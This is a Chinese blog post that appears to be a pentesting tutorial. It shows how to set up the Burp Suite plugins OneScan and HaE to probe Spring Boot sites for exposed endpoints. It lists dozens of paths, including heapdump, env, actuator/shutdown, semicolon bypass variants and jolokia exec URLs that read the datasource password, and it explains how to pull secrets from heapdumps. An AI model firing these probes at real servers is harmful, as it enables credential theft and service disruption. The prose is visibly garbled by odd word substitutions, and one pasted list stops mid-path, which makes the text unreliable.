寫在開始

下面說一下一些滲透SpringBoot時利用的BurpSuite插件和尋找缝隙的思路,主假如找特定文件來找一些泄漏的建设

操纵過程

安裝OneScanHaE
2023-08-04T02:28:38.png
点到OneScan的Dashboard里,点开Listen Proxy Message
2023-08-04T02:29:10.png
然後Payload裏Clear然後Paste一些判斷
2023-08-04T02:29:20.png

/api/swagger.json 
/v2/swagger.json 
/api/swagger.json 
/v2/api-docs 
/api-doc 
/swagger-resources 
/druid/index.html 
/services 
/admin 
/actuator 
/api/actuator 
/APPWebService 
/v3/api-docs 
/env 
/trace 
/api/v2/api-docs 
/v2/api-docs; 
/actuator; 
/js/ueditor/ueditor.config.js 
/nacos/index.html 
/jeecg-boot/ 
/ueditor/ueditor.config.js 
/getUserInfo 
/v1/api-docs 
/OfficeServer.jsp 
/APPWebService/AppService.asmx 
/js/config.js 
/env; 
/druid/login.html 
/druid/index.html 
/druid/basic.json 
/autoconfig 
/auditevents 
/configprops 
/dump 
/env 
/env/java.home 
/features 
/health 
/heapdump 
/logfile 
/loggers 
/jolokia 
/jolokia/list 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url 
/mappings 
/metrics/mem 
/metrics/ 
/restart 
/trace 
/actuator/druid/login.html 
/actuator/autoconfig 
/actuator/auditevents 
/actuator/configprops 
/actuator/beans 
/actuator/dump 
/actuator/env 
/actuator/env/java.home 
/actuator/features 
/actuator/health 
/actuator/heapdump 
/actuator/info 
/actuator/logfile 
/actuator/loggers 
/actuator/jolokia 
/actuator/jolokia/list 
/actuator/shutdown 
/actuator/trace 
/nacos 
;/api/swagger.json 
;/v2/swagger.json 
;/api/swagger.json 
;/v2/api-docs 
;/api-doc 
;/swagger-resources 
;/druid/index.html 
;/services 
;/actuator 
;/api/actuator 
;/APPWebService 
;/v3/api-docs 
;/env 
;/trace 
;/api/v2/api-docs 
;/v2/api-docs; 
;/actuator; 
;/js/ueditor/ueditor.config.js 
;/nacos/index.html 
;/jeecg-boot/ 
;/ueditor/ueditor.config.js 
;/getUserInfo 
;/v1/api-docs 
;/OfficeServer.jsp 
;/js/config.js 
;/env; 
;/druid/login.html 
;/druid/index.html 
;/druid/basic.json 
;/autoconfig 
;/auditevents 
;/configprops 
;/dump 
;/env 
;/env/java.home 
;/features 
;/health 
;/heapdump 
;/logfile 
;/loggers 
;/jolokia 
;/jolokia/list 
;/jolokia/exec/org.springframework

然後Other中再加載一下HaE
2023-08-04T02:29:43.png
點到HaE之後在Rules添加一條
2023-08-04T02:29:50.png
Regex設置爲(\{\"\_links\"\:\{\"self),後面遵循上圖設置。
之後回到Proxy裏打開浏覽器訪問頁面
2023-08-04T02:29:56.png
可以看到上面設置的紅色高亮
2023-08-04T02:30:07.png
檢查一下內容,首要看env和heapdump
2023-08-04T02:30:34.png
2023-08-04T02:30:40.png
打開env的url查看
2023-08-04T02:30:50.png
丟vscode中格式化
2023-08-04T02:40:08.png
查看此中有啥首要信息沒
heapdump利用JDumpSpider查看內容
2023-08-04T02:31:01.png

寫在最後

這個主假如找一些對應的文件,找對應的泄漏建设就好了,對應辅助的鏈接放在了對應位置自行下載

Last modification:August 4, 2023
若是覺得我的文┞仿對你有效,請隨意贊賞